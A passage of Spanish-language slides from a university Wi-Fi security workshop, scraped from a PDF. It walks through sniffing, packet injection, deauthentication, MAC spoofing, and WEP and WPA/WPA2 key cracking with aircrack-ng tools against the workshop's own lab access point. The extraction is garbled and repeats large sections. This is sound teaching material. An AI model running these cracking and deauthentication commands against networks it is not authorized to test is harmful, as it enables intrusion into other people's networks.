bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 11: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194

Vulnerabilidad

bull httpwwwsecurityfocuscom

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294

Analogiacutea de Seguridad

Acepto el riesgo

Minimizo el riesgo

Transfiero el riesgo

Amenaza

Vulnerabilidad

Riesgo

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394

Conexioacuten a Medios Alaacutembricos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494

Conexioacuten a Redes inalaacutembricas

bull WiFi (80211x)bull 80211abull 80211bbull

80211gbull 80211n

bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594

ClapgnagmlEncripcioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694

Encripcioacuten

bull Privacidadbull Autenticacioacuten

bull Integridad

bull No repudio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794

Encripcioacuten

bull Encripcioacuten Simeacutetrica

bull Encripcioacuten Asimeacutetrica

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994

II- Armando el Laboratorio

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094

Paraacutemetros del laboratorio

bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo

bull Abierto

bull Oculto

bull WEP

bull WPAWPA2

ndash MAC Addressbull 687F7404BE78 (LAN)

bull 687F7404BE7A (WLAN)

ndash Direcciones IPbull WL_AP1 192168165

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294

III- Conociendo BackTrack

bull

Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado

en un equipo de coacutemputo

bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades

ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394

Iniciando con BackTrack

bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD

bull Hacer clic en BackTrack Text ndash Default Boot Text

Mode

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494

Iniciando con BackTrack

bull Teclea el comando startx

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594

Iniciando con BackTrack

bull GUI de BackTrack 5

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694

Configurando la tarjeta

inalaacutembrica

bull Abre una terminal de consolabull Teclea iwconfig

C fi d l j

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794

Configurando la tarjeta

inalaacutembrica

bull Teclea ifconfig wlan0 up

bull Teclea ifconfig wlan0

bull Anota la direccioacuten MAC de tu tarjeta

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894

Conectaacutendose al AP

bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994

Conectaacutendose al AP

bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo

bull Teclea iwconfig wlan0

bull Verifica que tengas la MAC del Access Point

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094

Configurando una IP de la red

bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up

bull Verifica tecleando ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194

Probando conectividad

bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC

bull Abre un navegador e intenta navegar

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394

IV- Seguridad WLAN

bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing

ndash Packet injection

ndash Sniffing

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494

Capas OSITCP

bull Frames

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594

Frames WLAN (Beacons)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694

Campo Type

bull Frames de Administracioacuten ndash Authentication

ndash De-authentication

ndash Association Request Response

ndash maacutes

bull Frames de Control

ndash Request to Send (RTS)

ndash

Clear to Send (CTS) ndash Acknowledgement (ACK)

bull Frames de Datos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794

Frames Sniffing

bull Utilizaremos Wireshark ndash Airodump-NG

ndash Tcpdump

ndash Tshark

bull Reinicia tu equipo para que sean configuraciones

desde cero

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894

Modo Monitor

bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta

bull Levanta la tarjeta con ifconfig wlan0 up

bull Confirma que esteacute levantada con ifconfig wlan0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994

Modo Monitor

bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas

disponibles

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094

Interface en modo Monitor

bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface

llamada mon0

bull Teclear airmon-ng

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

